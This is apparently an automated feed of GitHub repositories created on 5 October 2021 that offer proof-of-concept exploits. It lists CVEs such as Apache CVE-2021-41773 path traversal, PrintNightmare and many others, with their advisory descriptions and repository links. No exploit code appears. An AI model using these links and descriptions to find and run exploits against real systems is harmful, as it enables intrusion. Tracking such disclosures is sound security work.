**Microsoft Office Onenote 2007 (CVE-2014-2815) ".ONEPKG" File Directory Traversal Vulnerability Leads to Arbitrary Code Execution** : [Edubr2020/CABTrap_OneNote2007](https://github.com/Edubr2020/CABTrap_OneNote2007) create time: 2021-10-05T21:15:27Z

**Poc.py** : [TishcaTpx/POC-CVE-2021-41773](https://github.com/TishcaTpx/POC-CVE-2021-41773) create time: 2021-10-05T20:41:34Z

**Exploitation of CVE-2021-41773 a Directory Traversal in Apache 2.4.49.** : [RyouYoo/CVE-2021-41773](https://github.com/RyouYoo/CVE-2021-41773) create time: 2021-10-05T20:30:01Z

**Working PowerShell POC** : [OppressionBreedsResistance/CVE-2021-1675-PrintNightmare](https://github.com/OppressionBreedsResistance/CVE-2021-1675-PrintNightmare) create time: 2021-10-05T19:24:23Z

**no description** : [masahiro331/CVE-2021-41773](https://github.com/masahiro331/CVE-2021-41773) create time: 2021-10-05T18:56:04Z

**no description** : [iilegacyyii/PoC-CVE-2021-41773](https://github.com/iilegacyyii/PoC-CVE-2021-41773) create time: 2021-10-05T17:30:43Z

**Light scan for ShellShock Vulnerability for Bash versions lower than 4.3.* [CVE-2014-6271]** : [0bfxgh0st/shellshock-scan](https://github.com/0bfxgh0st/shellshock-scan) create time: 2021-10-05T17:53:51Z

**POC: CVE-2019-12840 (Authenticated RCE - Webmin Package Updates)** : [WizzzStark/CVE-2019-12840.py](https://github.com/WizzzStark/CVE-2019-12840.py) create time: 2021-10-05T18:10:05Z

**no description** : [hacknotes/CVE-2019-15107-Exploit](https://github.com/hacknotes/CVE-2019-15107-Exploit) create time: 2021-10-05T18:02:13Z

**no description** : [ZephrFish/CVE-2021-41773-PoC](https://github.com/ZephrFish/CVE-2021-41773-PoC) create time: 2021-10-05T17:29:49Z

**Path traversal in Apache HTTP Server 2.4.49 (CVE-2021-41773)** : [knqyf263/CVE-2021-41773](https://github.com/knqyf263/CVE-2021-41773) create time: 2021-10-05T16:45:41Z

**CVE-2021-41773** : [numanturle/CVE-2021-41773](https://github.com/numanturle/CVE-2021-41773) create time: 2021-10-05T16:18:09Z

**CVE-2021-41773 Path Traversal vulnerability in Apache 2.4.49.** : [Vulnmachines/cve-2021-41773](https://github.com/Vulnmachines/cve-2021-41773) create time: 2021-10-05T16:13:38Z

**PoC for exploiting CVE-2020-14119 : There is command injection in the addMeshNode interface of xqnetwork.lua, which leads to command execution under administrator authority on Xiaomi router AX3600 with rom versionrom< 1.1.12** : [AIPOCAI/CVE-2020-14119](https://github.com/AIPOCAI/CVE-2020-14119) create time: 2021-10-05T11:17:13Z

**PoC for exploiting CVE-2020-21482 : A cross-site scripting (XSS) vulnerability in RGCMS v1.06 allows attackers to obtain the administrator's cookie via a crafted payload in the Name field under the Message Board module** : [AIPOCAI/CVE-2020-21482](https://github.com/AIPOCAI/CVE-2020-21482) create time: 2021-10-05T11:16:54Z

**PoC for exploiting CVE-2020-21481 : An arbitrary file upload vulnerability in RGCMS v1.06 allows attackers to execute arbitrary code via a crafted .txt file which is later changed to a PHP file.** : [AIPOCAI/CVE-2020-21481](https://github.com/AIPOCAI/CVE-2020-21481) create time: 2021-10-05T11:16:50Z

**PoC for exploiting CVE-2020-14124 : There is a buffer overflow in librsa.so called by getwifipwdurl interface, resulting in code execution on Xiaomi router AX3600 with ROM version =rom< 1.1.12.** : [AIPOCAI/CVE-2020-14124](https://github.com/AIPOCAI/CVE-2020-14124) create time: 2021-10-05T11:16:39Z

**PoC for exploiting CVE-2021-39204 : Pomerium is an open source identity-aware access proxy. Envoy, which Pomerium is based on, incorrectly handles resetting of HTTP/2 streams with excessive complexity. This can lead to high CPU utilization when a large number of streams are reset. This can result in a DoS condition. Pomerium versions 0.14.8 and 0.15.1 contain an upgraded envoy binary with this vulnerability patched.** : [AIPOCAI/CVE-2021-39204](https://github.com/AIPOCAI/CVE-2021-39204) create time: 2021-10-05T11:17:29Z

**PoC for exploiting CVE-2021-39206 : Pomerium is an open source identity-aware access proxy. Envoy, which Pomerium is based on, contains two authorization related vulnerabilities CVE-2021-32777 and CVE-2021-32779. This may lead to incorrect routing or authorization policy decisions. With specially crafted requests, incorrect authorization or routing decisions may be made by Pomerium. Pomerium v0.14.8 and v0.15.1 contain an upgraded envoy binary with these vulnerabilities patched. This issue can only be triggered when using path prefix based policy. Removing any such policies should provide mitigation.** : [AIPOCAI/CVE-2021-39206](https://github.com/AIPOCAI/CVE-2021-39206) create time: 2021-10-05T11:17:25Z

**PoC for exploiting CVE-2021-22005 : The vCenter Server contains an arbitrary file upload vulnerability in the Analytics service. A malicious actor with network access to port 443 on vCenter Server may exploit this issue to execute code on vCenter Server by uploading a specially crafted file.** : [AIPOCAI/CVE-2021-22005](https://github.com/AIPOCAI/CVE-2021-22005) create time: 2021-10-05T11:17:21Z

**PoC for exploiting CVE-2021-40965 : A Cross-Site Request Forgery (CSRF) vulnerability exists in TinyFileManager all version up to and including 2.4.6 that allows attackers to upload files and run OS commands by inducing the Administrator user to browse a URL controlled by an attacker.** : [AIPOCAI/CVE-2021-40965](https://github.com/AIPOCAI/CVE-2021-40965) create time: 2021-10-05T11:17:17Z

**PoC for exploiting CVE-2021-39201 : WordPress is a free and open-source content management system written in PHP and paired with a MySQL or MariaDB database. ### Impact The issue allows an authenticated but low-privileged user (like contributor/author) to execute XSS in the editor. This bypasses the restrictions imposed on users who do not have the permission to post `unfiltered_html`. ### Patches This has been patched in WordPress 5.8, and will be pushed to older versions via minor releases (automatic updates). It's strongly recommended that you keep auto-updates enabled to receive the fix. ### References https://wordpress.org/news/category/releases/ https://hackerone.com/reports/1142140 ### For more information If you have any questions or comments about this advisory: * Open an issue in [HackerOne](https://hackerone.com/wordpress)** : [AIPOCAI/CVE-2021-39201](https://github.com/AIPOCAI/CVE-2021-39201) create time: 2021-10-05T11:17:09Z

**PoC for exploiting CVE-2021-40966 : A Stored XSS exists in TinyFileManager All version up to and including 2.4.6 in /tinyfilemanager.php when the server is given a file that contains HTML and javascript in its name. A malicious user can upload a file with a malicious filename containing javascript code and it will run on any user browser when they access the server.** : [AIPOCAI/CVE-2021-40966](https://github.com/AIPOCAI/CVE-2021-40966) create time: 2021-10-05T11:17:05Z

**PoC for exploiting CVE-2021-40964 : A Path Traversal vulnerability exists in TinyFileManager all version up to and including 2.4.6 that allows attackers to upload a file (with Admin credentials or with the CSRF vulnerability) with the "fullpath" parameter containing path traversal strings (../ and ..\) in order to escape the server's intended working directory and write malicious files onto any directory on the computer.** : [AIPOCAI/CVE-2021-40964](https://github.com/AIPOCAI/CVE-2021-40964) create time: 2021-10-05T11:17:01Z

**PoC for exploiting CVE-2021-33693 : SAP Cloud Connector, version - 2.0, allows an authenticated administrator to modify a configuration file to inject malicious codes that could potentially lead to OS command execution.** : [AIPOCAI/CVE-2021-33693](https://github.com/AIPOCAI/CVE-2021-33693) create time: 2021-10-05T11:16:58Z

**PoC for exploiting CVE-2021-24620 : The WordPress Simple Ecommerce Shopping Cart Plugin- Sell products through Paypal plugin through 2.2.5 does not check for the uploaded Downloadable Digital product file, allowing any file, such as PHP to be uploaded by an administrator. Furthermore, as there is no CSRF in place, attackers could also make a logged admin upload a malicious PHP file, which would lead to RCE** : [AIPOCAI/CVE-2021-24620](https://github.com/AIPOCAI/CVE-2021-24620) create time: 2021-10-05T11:16:46Z

**PoC for exploiting CVE-2021-39239 : A vulnerability in XML processing in Apache Jena, in versions up to 4.1.0, may allow an attacker to execute XML External Entities (XXE), including exposing the contents of local files to a remote server.** : [AIPOCAI/CVE-2021-39239](https://github.com/AIPOCAI/CVE-2021-39239) create time: 2021-10-05T11:16:42Z

**PoC for exploiting CVE-2021-21993 : The vCenter Server contains an SSRF (Server Side Request Forgery) vulnerability due to improper validation of URLs in vCenter Server Content Library. An authorised user with access to content library may exploit this issue by sending a POST request to vCenter Server leading to information disclosure.** : [AIPOCAI/CVE-2021-21993](https://github.com/AIPOCAI/CVE-2021-21993) create time: 2021-10-05T11:16:31Z

**PoC for exploiting CVE-2006-4471 : The Admin Upload Image functionality in Joomla! before 1.0.11 allows remote authenticated users to upload files outside of the /images/stories/ directory via unspecified vectors.** : [AIPOCAI/CVE-2006-4471](https://github.com/AIPOCAI/CVE-2006-4471) create time: 2021-10-05T10:36:17Z

**PoC for exploiting CVE-2008-4796 : The _httpsrequest function (Snoopy/Snoopy.class.php) in Snoopy 1.2.3 and earlier, as used in (1) ampache, (2) libphp-snoopy, (3) mahara, (4) mediamate, (5) opendb, (6) pixelpost, and possibly other products, allows remote attackers to execute arbitrary commands via shell metacharacters in https URLs.** : [AIPOCAI/CVE-2008-4796](https://github.com/AIPOCAI/CVE-2008-4796) create time: 2021-10-05T10:53:26Z

**PoC for exploiting CVE-2021-33701 : DMIS Mobile Plug-In or SAP S/4HANA, versions - DMIS 2011_1_620, 2011_1_640, 2011_1_700, 2011_1_710, 2011_1_730, 710, 2011_1_731, 710, 2011_1_752, 2020, SAPSCORE 125, S4CORE 102, 102, 103, 104, 105, allows an attacker with access to highly privileged account to execute manipulated query in NDZT tool to gain access to Superuser account, leading to SQL Injection vulnerability, that highly impacts systems Confidentiality, Integrity and Availability.** : [AIPOCAI/CVE-2021-33701](https://github.com/AIPOCAI/CVE-2021-33701) create time: 2021-10-05T10:33:44Z

**PoC for exploiting CVE-2012-0881 : Apache Xerces2 Java Parser before 2.12.0 allows remote attackers to cause a denial of service (CPU consumption) via a crafted message to an XML service, which triggers hash table collisions.** : [AIPOCAI/CVE-2012-0881](https://github.com/AIPOCAI/CVE-2012-0881) create time: 2021-10-05T11:05:16Z

**PoC for exploiting CVE-2020-20128 : LaraCMS v1.0.1 transmits sensitive information in cleartext which can be intercepted by attackers.** : [AIPOCAI/CVE-2020-20128](https://github.com/AIPOCAI/CVE-2020-20128) create time: 2021-10-05T10:38:20Z

**PoC for exploiting CVE-2020-20129 : LaraCMS v1.0.1 contains a stored cross-site scripting (XSS) vulnerability which allows attackers to execute arbitrary web scripts or HTML via a crafted payload in the content editor.** : [AIPOCAI/CVE-2020-20129](https://github.com/AIPOCAI/CVE-2020-20129) create time: 2021-10-05T10:38:16Z

**PoC for exploiting CVE-2020-20131 : LaraCMS v1.0.1 contains a stored cross-site scripting (XSS) vulnerability which allows atackers to execute arbitrary web scripts or HTML via a crafted payload in the page management module.** : [AIPOCAI/CVE-2020-20131](https://github.com/AIPOCAI/CVE-2020-20131) create time: 2021-10-05T10:38:12Z

**PoC for exploiting CVE-2014-4611 : Integer overflow in the LZ4 algorithm implementation, as used in Yann Collet LZ4 before r118 and in the lz4_uncompress function in lib/lz4/lz4_decompress.c in the Linux kernel before 3.15.2, on 32-bit platforms might allow context-dependent attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via a crafted Literal Run that would be improperly handled by programs not complying with an API limitation, a different vulnerability than CVE-2014-4715.** : [AIPOCAI/CVE-2014-4611](https://github.com/AIPOCAI/CVE-2014-4611) create time: 2021-10-05T11:12:15Z

**PoC for exploiting CVE-2014-3704 : The expandArguments function in the database abstraction API in Drupal core 7.x before 7.32 does not properly construct prepared statements, which allows remote attackers to conduct SQL injection attacks via an array containing crafted keys.** : [AIPOCAI/CVE-2014-3704](https://github.com/AIPOCAI/CVE-2014-3704) create time: 2021-10-05T11:02:27Z

**PoC for exploiting CVE-2016-2568 : pkexec, when used with --user nonpriv, allows local users to escape to the parent session via a crafted TIOCSTI ioctl call, which pushes characters to the terminal's input buffer.** : [AIPOCAI/CVE-2016-2568](https://github.com/AIPOCAI/CVE-2016-2568) create time: 2021-10-05T11:03:34Z

**PoC for exploiting CVE-2016-5385 : PHP through 7.0.8 does not attempt to address RFC 3875 section 4.1.18 namespace conflicts and therefore does not protect applications from the presence of untrusted client data in the HTTP_PROXY environment variable, which might allow remote attackers to redirect an application's outbound HTTP traffic to an arbitrary proxy server via a crafted Proxy header in an HTTP request, as demonstrated by (1) an application that makes a getenv('HTTP_PROXY') call or (2) a CGI configuration of PHP, aka an "httpoxy" issue.** : [AIPOCAI/CVE-2016-5385](https://github.com/AIPOCAI/CVE-2016-5385) create time: 2021-10-05T11:00:29Z

**PoC for exploiting CVE-2016-10045 : The isMail transport in PHPMailer before 5.2.20 might allow remote attackers to pass extra parameters to the mail command and consequently execute arbitrary code by leveraging improper interaction between the escapeshellarg function and internal escaping performed in the mail function in PHP. NOTE: this vulnerability exists because of an incorrect fix for CVE-2016-10033.** : [AIPOCAI/CVE-2016-10045](https://github.com/AIPOCAI/CVE-2016-10045) create time: 2021-10-05T10:53:01Z

**PoC for exploiting CVE-2016-10033 : The mailSend function in the isMail transport in PHPMailer before 5.2.18 might allow remote attackers to pass extra parameters to the mail command and consequently execute arbitrary code via a \" (backslash double quote) in a crafted Sender property.** : [AIPOCAI/CVE-2016-10033](https://github.com/AIPOCAI/CVE-2016-10033) create time: 2021-10-05T10:52:57Z

**PoC for exploiting CVE-2016-20012 : OpenSSH through 8.7 allows remote attackers, who have a suspicion that a certain combination of username and public key is known to an SSH server, to test whether this suspicion is correct. This occurs because a challenge is sent only when that combination could be valid for a login session.** : [AIPOCAI/CVE-2016-20012](https://github.com/AIPOCAI/CVE-2016-20012) create time: 2021-10-05T10:51:32Z

**PoC for exploiting CVE-2017-11189 : unrarlib.c in unrar-free 0.0.1 might allow remote attackers to cause a denial of service (NULL pointer dereference and application crash), which could be relevant if unrarlib is used as library code for a long-running application. NOTE: one of the several test cases in the references may be the same as what was separately reported as CVE-2017-14121.** : [AIPOCAI/CVE-2017-11189](https://github.com/AIPOCAI/CVE-2017-11189) create time: 2021-10-05T10:55:53Z

**PoC for exploiting CVE-2017-14121 : The DecodeNumber function in unrarlib.c in unrar 0.0.1 (aka unrar-free or unrar-gpl) suffers from a NULL pointer dereference flaw triggered by a crafted RAR archive. NOTE: this may be the same as one of the several test cases in the CVE-2017-11189 references.** : [AIPOCAI/CVE-2017-14121](https://github.com/AIPOCAI/CVE-2017-14121) create time: 2021-10-05T10:55:49Z

**PoC for exploiting CVE-2017-12678 : In TagLib 1.11.1, the rebuildAggregateFrames function in id3v2framefactory.cpp has a pointer to cast vulnerability, which allows remote attackers to cause a denial of service or possibly have unspecified other impact via a crafted audio file.** : [AIPOCAI/CVE-2017-12678](https://github.com/AIPOCAI/CVE-2017-12678) create time: 2021-10-05T10:50:46Z

**PoC for exploiting CVE-2018-16177 : Untrusted search path vulnerability in The installer of Windows 10 Fall Creators Update Modify module for Security Measures tool allows an attacker to gain privileges via a Trojan horse DLL in an unspecified directory.** : [AIPOCAI/CVE-2018-16177](https://github.com/AIPOCAI/CVE-2018-16177) create time: 2021-10-05T11:03:31Z

**PoC for exploiting CVE-2018-14773 : An issue was discovered in Http Foundation in Symfony 2.7.0 through 2.7.48, 2.8.0 through 2.8.43, 3.3.0 through 3.3.17, 3.4.0 through 3.4.13, 4.0.0 through 4.0.13, and 4.1.0 through 4.1.2. It arises from support for a (legacy) IIS header that lets users override the path in the request URL via the X-Original-URL or X-Rewrite-URL HTTP request header. These headers are designed for IIS support, but it's not verified that the server is in fact running IIS, which means anybody who can send these requests to an application can trigger this. This affects \Symfony\Component\HttpFoundation\Request::prepareRequestUri() where X-Original-URL and X_REWRITE_URL are both used. The fix drops support for these methods so that they cannot be used as attack vectors such as web cache poisoning.** : [AIPOCAI/CVE-2018-14773](https://github.com/AIPOCAI/CVE-2018-14773) create time: 2021-10-05T11:00:25Z

**PoC for exploiting CVE-2018-5729 : MIT krb5 1.6 or later allows an authenticated kadmin with permission to add principals to an LDAP Kerberos database to cause a denial of service (NULL pointer dereference) or bypass a DN container check by supplying tagged data that is internal to the database module.** : [AIPOCAI/CVE-2018-5729](https://github.com/AIPOCAI/CVE-2018-5729) create time: 2021-10-05T10:51:03Z

**PoC for exploiting CVE-2018-5730 : MIT krb5 1.6 or later allows an authenticated kadmin with permission to add principals to an LDAP Kerberos database to circumvent a DN containership check by supplying both a "linkdn" and "containerdn" database argument, or by supplying a DN string which is a left extension of a container DN string but is not hierarchically within the container DN.** : [AIPOCAI/CVE-2018-5730](https://github.com/AIPOCAI/CVE-2018-5730) create time: 2021-10-05T10:50:59Z

**PoC for exploiting CVE-2018-20217 : A Reachable Assertion issue was discovered in the KDC in MIT Kerberos 5 (aka krb5) before 1.17. If an attacker can obtain a krbtgt ticket using an older encryption type (single-DES, triple-DES, or RC4), the attacker can crash the KDC by making an S4U2Self request.** : [AIPOCAI/CVE-2018-20217](https://github.com/AIPOCAI/CVE-2018-20217) create time: 2021-10-05T10:50:55Z

**PoC for exploiting CVE-2018-11439 : The TagLib::Ogg::FLAC::File::scan function in oggflacfile.cpp in TagLib 1.11.1 allows remote attackers to cause information disclosure (heap-based buffer over-read) via a crafted audio file.** : [AIPOCAI/CVE-2018-11439](https://github.com/AIPOCAI/CVE-2018-11439) create time: 2021-10-05T10:50:42Z

**PoC for exploiting CVE-2019-11595 : In uBlock before 0.9.5.15, the $rewrite filter option allows filter-list maintainers to run arbitrary code in a client-side session when a web service loads a script for execution using XMLHttpRequest or Fetch, and the script origin has an open redirect.** : [AIPOCAI/CVE-2019-11595](https://github.com/AIPOCAI/CVE-2019-11595) create time: 2021-10-05T11:16:23Z

**PoC for exploiting CVE-2019-18413 : In TypeStack class-validator 0.10.2, validate() input validation can be bypassed because certain internal attributes can be overwritten via a conflicting name. Even though there is an optional forbidUnknownValues parameter that can be used to reduce the risk of this bypass, this option is not documented and thus most developers configure input validation in the vulnerable default manner. With this vulnerability, attackers can launch SQL Injection or XSS attacks by injecting arbitrary malicious input. NOTE: a software maintainer agrees with the "is not documented" finding but suggests that much of the responsibility for the risk lies in a different product.** : [AIPOCAI/CVE-2019-18413](https://github.com/AIPOCAI/CVE-2019-18413) create time: 2021-10-05T11:12:08Z

**PoC for exploiting CVE-2019-10095 : bash command injection vulnerability in Apache Zeppelin allows an attacker to inject system commands into Spark interpreter settings. This issue affects Apache Zeppelin Apache Zeppelin version 0.9.0 and prior versions.** : [AIPOCAI/CVE-2019-10095](https://github.com/AIPOCAI/CVE-2019-10095) create time: 2021-10-05T11:11:55Z

**PoC for exploiting CVE-2019-9060 : An issue was discovered in CMS Made Simple 2.2.8. It is possible to achieve unauthenticated path traversal in the CGExtensions module (in the file action.setdefaulttemplate.php) with the m1_filename parameter; and through the action.showmessage.php file, it is possible to read arbitrary file content (by using that path traversal with m1_prefname set to cg_errormsg and m1_resettodefault=1).** : [AIPOCAI/CVE-2019-9060](https://github.com/AIPOCAI/CVE-2019-9060) create time: 2021-10-05T11:05:51Z

**PoC for exploiting CVE-2019-0227 : A Server Side Request Forgery (SSRF) vulnerability affected the Apache Axis 1.4 distribution that was last released in 2006. Security and bug commits commits continue in the projects Axis 1.x Subversion repository, legacy users are encouraged to build from source. The successor to Axis 1.x is Axis2, the latest version is 1.7.9 and is not vulnerable to this issue.** : [AIPOCAI/CVE-2019-0227](https://github.com/AIPOCAI/CVE-2019-0227) create time: 2021-10-05T11:03:43Z

**PoC for exploiting CVE-2019-12823 : Craft CMS before 3.1.31 does not properly filter XML feeds and thus allowing XSS.** : [AIPOCAI/CVE-2019-12823](https://github.com/AIPOCAI/CVE-2019-12823) create time: 2021-10-05T11:03:19Z

**PoC for exploiting CVE-2019-3820 : It was discovered that the gnome-shell lock screen since version 3.15.91 did not properly restrict all contextual actions. An attacker with physical access to a locked workstation could invoke certain keyboard shortcuts, and potentially other actions.** : [AIPOCAI/CVE-2019-3820](https://github.com/AIPOCAI/CVE-2019-3820) create time: 2021-10-05T11:02:19Z

**PoC for exploiting CVE-2019-10910 : In Symfony before 2.7.51, 2.8.x before 2.8.50, 3.x before 3.4.26, 4.x before 4.1.12, and 4.2.x before 4.2.7, when service ids allow user input, this could allow for SQL Injection and remote code execution. This is related to symfony/dependency-injection.** : [AIPOCAI/CVE-2019-10910](https://github.com/AIPOCAI/CVE-2019-10910) create time: 2021-10-05T11:00:17Z

**PoC for exploiting CVE-2019-10911 : In Symfony before 2.7.51, 2.8.x before 2.8.50, 3.x before 3.4.26, 4.x before 4.1.12, and 4.2.x before 4.2.7, a vulnerability would allow an attacker to authenticate as a privileged user on sites with user registration and remember me login functionality enabled. This is related to symfony/security.** : [AIPOCAI/CVE-2019-10911](https://github.com/AIPOCAI/CVE-2019-10911) create time: 2021-10-05T11:00:13Z

**PoC for exploiting CVE-2018-8256 : A remote code execution vulnerability exists when PowerShell improperly handles specially crafted files, aka "Microsoft PowerShell Remote Code Execution Vulnerability." This affects Windows RT 8.1, PowerShell Core 6.0, Microsoft.PowerShell.Archive 1.2.2.0, Windows Server 2016, Windows Server 2012, Windows Server 2008 R2, Windows Server 2019, Windows 7, Windows Server 2012 R2, PowerShell Core 6.1, Windows 10 Servers, Windows 10, Windows 8.1.** : [AIPOCAI/CVE-2018-8256](https://github.com/AIPOCAI/CVE-2018-8256) create time: 2021-10-05T10:53:06Z

**PoC for exploiting CVE-2019-19797 : read_colordef in read.c in Xfig fig2dev 3.2.7b has an out-of-bounds write.** : [AIPOCAI/CVE-2019-19797](https://github.com/AIPOCAI/CVE-2019-19797) create time: 2021-10-05T10:37:13Z

**PoC for exploiting CVE-2021-39862 : Adobe Framemaker versions 2019 Update 8 (and earlier) and 2020 Release Update 2 (and earlier) are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.** : [AIPOCAI/CVE-2021-39862](https://github.com/AIPOCAI/CVE-2021-39862) create time: 2021-10-05T10:34:43Z

**PoC for exploiting CVE-2021-40697 : Adobe Framemaker versions 2019 Update 8 (and earlier) and 2020 Release Update 2 (and earlier) are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.** : [AIPOCAI/CVE-2021-40697](https://github.com/AIPOCAI/CVE-2021-40697) create time: 2021-10-05T10:33:56Z

**PoC for exploiting CVE-2021-39865 : Adobe Framemaker versions 2019 Update 8 (and earlier) and 2020 Release Update 2 (and earlier) are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.** : [AIPOCAI/CVE-2021-39865](https://github.com/AIPOCAI/CVE-2021-39865) create time: 2021-10-05T10:33:52Z

**PoC for exploiting CVE-2019-7254 : Linear eMerge E3-Series devices allow File Inclusion.** : [AIPOCAI/CVE-2019-7254](https://github.com/AIPOCAI/CVE-2019-7254) create time: 2021-10-05T10:32:37Z

**PoC for exploiting CVE-2020-21480 : An arbitrary file write vulnerability in RGCMS v1.06 allows attackers to execute arbitrary code via a crafted PHP file.** : [AIPOCAI/CVE-2020-21480](https://github.com/AIPOCAI/CVE-2020-21480) create time: 2021-10-05T11:16:35Z

**PoC for exploiting CVE-2020-21605 : libde265 v1.0.4 contains a segmentation fault in the apply_sao_internal function, which can be exploited via a crafted a file.** : [AIPOCAI/CVE-2020-21605](https://github.com/AIPOCAI/CVE-2020-21605) create time: 2021-10-05T11:16:27Z

**PoC for exploiting CVE-2020-21606 : libde265 v1.0.4 contains a heap buffer overflow fault in the put_epel_16_fallback function, which can be exploited via a crafted a file.** : [AIPOCAI/CVE-2020-21606](https://github.com/AIPOCAI/CVE-2020-21606) create time: 2021-10-05T11:15:30Z

**PoC for exploiting CVE-2020-21601 : libde265 v1.0.4 contains a stack buffer overflow in the put_qpel_fallback function, which can be exploited via a crafted a file.** : [AIPOCAI/CVE-2020-21601](https://github.com/AIPOCAI/CVE-2020-21601) create time: 2021-10-05T11:15:22Z

**PoC for exploiting CVE-2020-21602 : libde265 v1.0.4 contains a heap buffer overflow in the put_weighted_bipred_16_fallback function, which can be exploited via a crafted a file.** : [AIPOCAI/CVE-2020-21602](https://github.com/AIPOCAI/CVE-2020-21602) create time: 2021-10-05T11:15:13Z

**PoC for exploiting CVE-2020-21604 : libde265 v1.0.4 contains a heap buffer overflow fault in the _mm_loadl_epi64 function, which can be exploited via a crafted a file.** : [AIPOCAI/CVE-2020-21604](https://github.com/AIPOCAI/CVE-2020-21604) create time: 2021-10-05T11:15:09Z

**PoC for exploiting CVE-2020-21603 : libde265 v1.0.4 contains a heap buffer overflow in the put_qpel_0_0_fallback_16 function, which can be exploited via a crafted a file.** : [AIPOCAI/CVE-2020-21603](https://github.com/AIPOCAI/CVE-2020-21603) create time: 2021-10-05T11:15:05Z

**PoC for exploiting CVE-2020-21597 : libde265 v1.0.4 contains a heap buffer overflow in the mc_chroma function, which can be exploited via a crafted a file.** : [AIPOCAI/CVE-2020-21597](https://github.com/AIPOCAI/CVE-2020-21597) create time: 2021-10-05T11:14:59Z

**PoC for exploiting CVE-2020-21598 : libde265 v1.0.4 contains a heap buffer overflow in the ff_hevc_put_unweighted_pred_8_sse function, which can be exploited via a crafted a file.** : [AIPOCAI/CVE-2020-21598](https://github.com/AIPOCAI/CVE-2020-21598) create time: 2021-10-05T11:14:55Z

**PoC for exploiting CVE-2020-21599 : libde265 v1.0.4 contains a heap buffer overflow in the de265_image::available_zscan function, which can be exploited via a crafted a file.** : [AIPOCAI/CVE-2020-21599](https://github.com/AIPOCAI/CVE-2020-21599) create time: 2021-10-05T11:14:51Z

**PoC for exploiting CVE-2020-21600 : libde265 v1.0.4 contains a heap buffer overflow in the put_weighted_pred_avg_16_fallback function, which can be exploited via a crafted a file.** : [AIPOCAI/CVE-2020-21600](https://github.com/AIPOCAI/CVE-2020-21600) create time: 2021-10-05T11:14:48Z

**PoC for exploiting CVE-2020-21594 : libde265 v1.0.4 contains a heap buffer overflow in the put_epel_hv_fallback function, which can be exploited via a crafted a file.** : [AIPOCAI/CVE-2020-21594](https://github.com/AIPOCAI/CVE-2020-21594) create time: 2021-10-05T11:14:44Z

**PoC for exploiting CVE-2020-21596 : libde265 v1.0.4 contains a global buffer overflow in the decode_CABAC_bit function, which can be exploited via a crafted a file.** : [AIPOCAI/CVE-2020-21596](https://github.com/AIPOCAI/CVE-2020-21596) create time: 2021-10-05T11:14:40Z

**PoC for exploiting CVE-2020-21595 : libde265 v1.0.4 contains a heap buffer overflow in the mc_luma function, which can be exploited via a crafted a file.** : [AIPOCAI/CVE-2020-21595](https://github.com/AIPOCAI/CVE-2020-21595) create time: 2021-10-05T11:14:37Z

**PoC for exploiting CVE-2020-24574 : The client (aka GalaxyClientService.exe) in GOG GALAXY through 2.0.41 (as of 12:58 AM Eastern, 9/26/21) allows local privilege escalation from any authenticated user to SYSTEM by instructing the Windows service to execute arbitrary commands. This occurs because the attacker can inject a DLL into GalaxyClient.exe, defeating the TCP-based "trusted client" protection mechanism.** : [AIPOCAI/CVE-2020-24574](https://github.com/AIPOCAI/CVE-2020-24574) create time: 2021-10-05T11:13:20Z

**PoC for exploiting CVE-2020-3960 : VMware ESXi (6.7 before ESXi670-202006401-SG and 6.5 before ESXi650-202005401-SG), Workstation (15.x before 15.5.5), and Fusion (11.x before 11.5.5) contain an out-of-bounds read vulnerability in NVMe functionality. A malicious actor with local non-administrative access to a virtual machine with a virtual NVMe controller present may be able to read privileged information contained in physical memory.** : [AIPOCAI/CVE-2020-3960](https://github.com/AIPOCAI/CVE-2020-3960) create time: 2021-10-05T11:12:57Z

**PoC for exploiting CVE-2020-13929 : Authentication bypass vulnerability in Apache Zeppelin allows an attacker to bypass Zeppelin authentication mechanism to act as another user. This issue affects Apache Zeppelin Apache Zeppelin version 0.9.0 and prior versions.** : [AIPOCAI/CVE-2020-13929](https://github.com/AIPOCAI/CVE-2020-13929) create time: 2021-10-05T11:11:59Z

**PoC for exploiting CVE-2021-40155 : A maliciously crafted DWG file in Autodesk Navisworks 2019, 2020, 2021, 2022 can be forced to read beyond allocated boundaries when parsing the DWG files. This vulnerability can be exploited to execute arbitrary code.** : [AIPOCAI/CVE-2021-40155](https://github.com/AIPOCAI/CVE-2021-40155) create time: 2021-10-05T11:11:43Z

**PoC for exploiting CVE-2021-40156 : A maliciously crafted DWG file in Autodesk Navisworks 2019, 2020, 2021, 2022 can be forced to write beyond allocated boundaries when parsing the DWG files. This vulnerability can be exploited to execute arbitrary code.** : [AIPOCAI/CVE-2021-40156](https://github.com/AIPOCAI/CVE-2021-40156) create time: 2021-10-05T11:11:39Z

**PoC for exploiting CVE-2020-21321 : emlog v6.0 contains a Cross-Site Request Forgery (CSRF) via /admin/link.php?action=addlink, which allows attackers to arbitrarily add articles.** : [AIPOCAI/CVE-2020-21321](https://github.com/AIPOCAI/CVE-2020-21321) create time: 2021-10-05T11:09:43Z

**PoC for exploiting CVE-2020-21322 : An arbitrary file upload vulnerability in Feehi CMS v2.0.8 and below allows attackers to execute arbitrary code via a crafted PHP file.** : [AIPOCAI/CVE-2020-21322](https://github.com/AIPOCAI/CVE-2020-21322) create time: 2021-10-05T11:09:32Z

**PoC for exploiting CVE-2020-21483 : An arbitrary file upload vulnerability in Jizhicms v1.5 allows attackers to execute arbitrary code via a crafted .jpg file which is later changed to a PHP file.** : [AIPOCAI/CVE-2020-21483](https://github.com/AIPOCAI/CVE-2020-21483) create time: 2021-10-05T11:09:05Z

**PoC for exploiting CVE-2020-21121 : Pligg CMS 2.0.2 contains a time-based SQL injection vulnerability via the $recordIDValue parameter in the admin_update_module_widgets.php file.** : [AIPOCAI/CVE-2020-21121](https://github.com/AIPOCAI/CVE-2020-21121) create time: 2021-10-05T11:08:52Z

**PoC for exploiting CVE-2020-21122 : UReport v2.2.9 contains a Server-Side Request Forgery (SSRF) in the designer page which allows attackers to detect intranet device ports.** : [AIPOCAI/CVE-2020-21122](https://github.com/AIPOCAI/CVE-2020-21122) create time: 2021-10-05T11:08:44Z

